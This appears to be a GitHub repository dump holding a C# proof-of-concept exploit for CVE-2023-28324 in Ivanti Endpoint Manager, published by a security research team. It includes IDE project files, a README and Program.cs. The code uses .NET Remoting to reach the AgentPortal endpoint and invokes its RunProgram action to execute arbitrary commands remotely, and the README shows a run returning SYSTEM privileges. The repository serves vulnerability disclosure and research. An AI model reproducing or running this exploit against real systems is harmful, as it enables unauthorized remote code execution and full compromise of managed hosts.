├── .idea ├── .idea.CVE-2023-28324 │ └── .idea │ │ ├── .gitignore │ │ ├── encodings.xml │ │ ├── indexLayout.xml │ │ └── vcs.xml └── .idea.CVE-2024-29847 │ └── .idea │ ├── .gitignore │ ├── encodings.xml │ ├── indexLayout.xml │ └── vcs.xml ├── CVE-2023-28324.sln ├── CVE-2023-28324 ├── .gitignore ├── CVE-2023-28324.csproj ├── Program.cs └── Properties │ └── AssemblyInfo.cs └── README.md /.idea/.idea.CVE-2023-28324/.idea/.gitignore: -------------------------------------------------------------------------------- 1 | # Default ignored files 2 | /shelf/ 3 | /workspace.xml 4 | # Rider ignored files 5 | /.idea.CVE-2023-28324.iml 6 | /contentModel.xml 7 | /modules.xml 8 | /projectSettingsUpdater.xml 9 | # Editor-based HTTP Client requests 10 | /httpRequests/ 11 | # Datasource local storage ignored files 12 | /dataSources/ 13 | /dataSources.local.xml 14 | -------------------------------------------------------------------------------- /.idea/.idea.CVE-2023-28324/.idea/encodings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | -------------------------------------------------------------------------------- /.idea/.idea.CVE-2023-28324/.idea/indexLayout.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /.idea/.idea.CVE-2023-28324/.idea/vcs.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /.idea/.idea.CVE-2024-29847/.idea/.gitignore: -------------------------------------------------------------------------------- 1 | # Default ignored files 2 | /shelf/ 3 | /workspace.xml 4 | # Rider ignored files 5 | /contentModel.xml 6 | /modules.xml 7 | /projectSettingsUpdater.xml 8 | /.idea.CVE-2024-29847.iml 9 | # Editor-based HTTP Client requests 10 | /httpRequests/ 11 | # Datasource local storage ignored files 12 | /dataSources/ 13 | /dataSources.local.xml 14 | -------------------------------------------------------------------------------- /.idea/.idea.CVE-2024-29847/.idea/encodings.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | -------------------------------------------------------------------------------- /.idea/.idea.CVE-2024-29847/.idea/indexLayout.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /.idea/.idea.CVE-2024-29847/.idea/vcs.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /CVE-2023-28324.sln: -------------------------------------------------------------------------------- 1 | 2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "CVE-2023-28324", "CVE-2023-28324\CVE-2023-28324.csproj", "{8FEB67B5-AC03-416D-90F2-BAA5C0BE593D}" 4 | EndProject 5 | Global 6 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 7 | Debug|Any CPU = Debug|Any CPU 8 | Release|Any CPU = Release|Any CPU 9 | EndGlobalSection 10 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 11 | {8FEB67B5-AC03-416D-90F2-BAA5C0BE593D}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 12 | {8FEB67B5-AC03-416D-90F2-BAA5C0BE593D}.Debug|Any CPU.Build.0 = Debug|Any CPU 13 | {8FEB67B5-AC03-416D-90F2-BAA5C0BE593D}.Release|Any CPU.ActiveCfg = Release|Any CPU 14 | {8FEB67B5-AC03-416D-90F2-BAA5C0BE593D}.Release|Any CPU.Build.0 = Release|Any CPU 15 | EndGlobalSection 16 | EndGlobal 17 | -------------------------------------------------------------------------------- /CVE-2023-28324/.gitignore: -------------------------------------------------------------------------------- 1 | bin/ 2 | obj/ -------------------------------------------------------------------------------- /CVE-2023-28324/CVE-2023-28324.csproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 5 | 6 | Debug 7 | AnyCPU 8 | {8FEB67B5-AC03-416D-90F2-BAA5C0BE593D} 9 | Exe 10 | Properties 11 | CVE-2023-28324 12 | CVE-2023-28324 13 | v4.8.1 14 | 512 15 | true 16 | 17 | 18 | x64 19 | true 20 | full 21 | false 22 | bin\Debug\ 23 | DEBUG;TRACE 24 | prompt 25 | 4 26 | 27 | 28 | x64 29 | pdbonly 30 | true 31 | bin\Release\ 32 | TRACE 33 | prompt 34 | 4 35 | 36 | 37 | 38 | ..\AgentPortal.exe 39 | 40 | 41 | ..\APCommon.dll 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | 64 | 65 | 66 | -------------------------------------------------------------------------------- /CVE-2023-28324/Program.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Runtime.Remoting.Channels; 3 | using System.Runtime.Remoting.Channels.Tcp; 4 | using System.Threading; 5 | using LANDesk.AgentPortal; 6 | 7 | namespace CVE 8 | { 9 | internal class Program 10 | { 11 | public static void Main(string[] args) 12 | { 13 | TcpChannel channel = new TcpChannel(); 14 | ChannelServices.RegisterChannel(channel, false); 15 | 16 | if (args.Length < 3) 17 | { 18 | Console.WriteLine("Usage: Program.exe [arguments_for_program]"); 19 | return; 20 | } 21 | 22 | var ip = args[0]; 23 | var port = args[1]; 24 | var command = args[2]; 25 | string arguments = ""; 26 | if (args.Length > 3) 27 | { 28 | arguments = string.Join(" ", args, 3, args.Length - 3); 29 | } 30 | 31 | string url = String.Format("tcp://{0}:{1}/LANDeskAgentPortal/LDSM", ip, port); 32 | IAgentPortal agentPortal = (IAgentPortal)Activator.GetObject(typeof(IAgentPortal), url); 33 | 34 | try 35 | { 36 | Console.WriteLine("Sending request."); 37 | bool request_result = agentPortal.Request("localhost", IAgentPortalBase.ActionEnum.RunProgram, command, arguments); 38 | Console.WriteLine("Request result: " + request_result); 39 | 40 | string[] result = agentPortal.GetResult("localhost"); 41 | while (result == null) 42 | { 43 | Console.WriteLine("Waiting for result."); 44 | result = agentPortal.GetResult("localhost"); 45 | Thread.Sleep(1000); 46 | } 47 | Console.WriteLine("Result: " + string.Join("\n", result)); 48 | 49 | } 50 | catch (Exception e) 51 | { 52 | Console.WriteLine(e); 53 | } 54 | } 55 | } 56 | } -------------------------------------------------------------------------------- /CVE-2023-28324/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.InteropServices; 3 | 4 | // General Information about an assembly is controlled through the following 5 | // set of attributes. Change these attribute values to modify the information 6 | // associated with an assembly. 7 | [assembly: AssemblyTitle("CVE-2023-28324")] 8 | [assembly: AssemblyDescription("")] 9 | [assembly: AssemblyConfiguration("")] 10 | [assembly: AssemblyCompany("")] 11 | [assembly: AssemblyProduct("CVE-2023-28324")] 12 | [assembly: AssemblyCopyright("Copyright © 2024")] 13 | [assembly: AssemblyTrademark("")] 14 | [assembly: AssemblyCulture("")] 15 | 16 | // Setting ComVisible to false makes the types in this assembly not visible 17 | // to COM components. If you need to access a type in this assembly from 18 | // COM, set the ComVisible attribute to true on that type. 19 | [assembly: ComVisible(false)] 20 | 21 | // The following GUID is for the ID of the typelib if this project is exposed to COM 22 | [assembly: Guid("8FEB67B5-AC03-416D-90F2-BAA5C0BE593D")] 23 | 24 | // Version information for an assembly consists of the following four values: 25 | // 26 | // Major Version 27 | // Minor Version 28 | // Build Number 29 | // Revision 30 | // 31 | // You can specify all the values or you can default the Build and Revision Numbers 32 | // by using the '*' as shown below: 33 | // [assembly: AssemblyVersion("1.0.*")] 34 | [assembly: AssemblyVersion("1.0.0.0")] 35 | [assembly: AssemblyFileVersion("1.0.0.0")] -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # CVE-2023-28324 2 | POC for CVE-2023-28324 affecting Ivanti EPM. 3 | 4 | ## Technical Analysis 5 | A technical root cause analysis of the vulnerability can be found on our blog: 6 | https://www.horizon3.ai/attack-research/attack-blogs/cve-2023-28324-deep-dive/ 7 | 8 | ## Summary 9 | This POC abuses a vulnerability in `AgentPortal.exe` to execute arbitrary commands. In order for this POC to work, you 10 | must provide your own references to `AgentPortal.exe` and `APCommon.dll` from an Ivanti EPM installation. 11 | 12 | ## Usage 13 | ```plaintext 14 | CVE-2023-28324.exe 192.168.1.21 49668 whoami.exe 15 | Sending request. 16 | Request result: True 17 | Waiting for result. 18 | Waiting for result. 19 | Result: nt authority\system 20 | ``` 21 | 22 | ## Follow the Horizon3.ai Attack Team on Twitter for the latest security research: 23 | * [Horizon3 Attack Team](https://twitter.com/Horizon3Attack) 24 | * [James Horseman](https://twitter.com/JamesHorseman2) 25 | * [Zach Hanley](https://twitter.com/hacks_zach) 26 | 27 | ## Disclaimer 28 | This software has been created purely for the purposes of academic research and for the development of effective defensive techniques, and is not intended to be used to attack systems except where explicitly authorized. Project maintainers are not responsible or liable for misuse of the software. Use responsibly. 29 | --------------------------------------------------------------------------------